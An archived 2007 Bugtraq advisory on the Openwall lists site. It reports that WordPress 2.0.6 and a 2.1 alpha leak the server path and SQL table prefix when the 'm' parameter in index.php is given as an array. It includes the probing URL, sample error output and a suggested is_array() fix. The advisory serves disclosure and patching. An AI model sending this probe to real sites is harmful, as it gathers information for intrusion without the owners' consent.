lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070112013247.15767.qmail@securityfocus.com>
Date: 12 Jan 2007 01:32:47 -0000
From: process@...ct.org
To: bugtraq@...urityfocus.com
Subject: Wordpress disclosure of Table Prefix Weakness

Wordpress Full Path disclosure and disclosure of Table Prefix Weakness

Description:

Affected system:
WordPress 2.1Alpha 3(SVN:4662)
WordPress =>2.0.6

xy7 has discovered a weakness in WordPress, which can be exploited by 

malicious people to disclose SQL information and Wordpress Full Path.

The problem is that SQL error messages are returned to the user. This can 

be exploited to disclose the configured table prefix via an invalid "m" 

parameter passed in index.php.

Example:
http://[host]/index.php?m[]=


You will see return information like this:
Warning: rawurlencode() expects parameter 1 to be string, array given in 

[path]\wp-includes\classes.php on line 227

WordPress &#25968;&#25454;&#24211;&#38169;&#35823;: [Unknown column 'Arra' in 'where clause']
SELECT SQL_CALC_FOUND_ROWS wp_posts.* FROM wp_posts WHERE 1=1 AND YEAR

(post_date)=Arra AND (post_type = 'post' AND (post_status = 'publish' OR 

post_status = 'private')) ORDER BY post_date DESC LIMIT 0, 10


Solution:
Edit the source use is_array() function to Inspection Var "$m"

Provided and/or discovered by:
Xy7 of Bug.Center.Team found the vulnerability 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ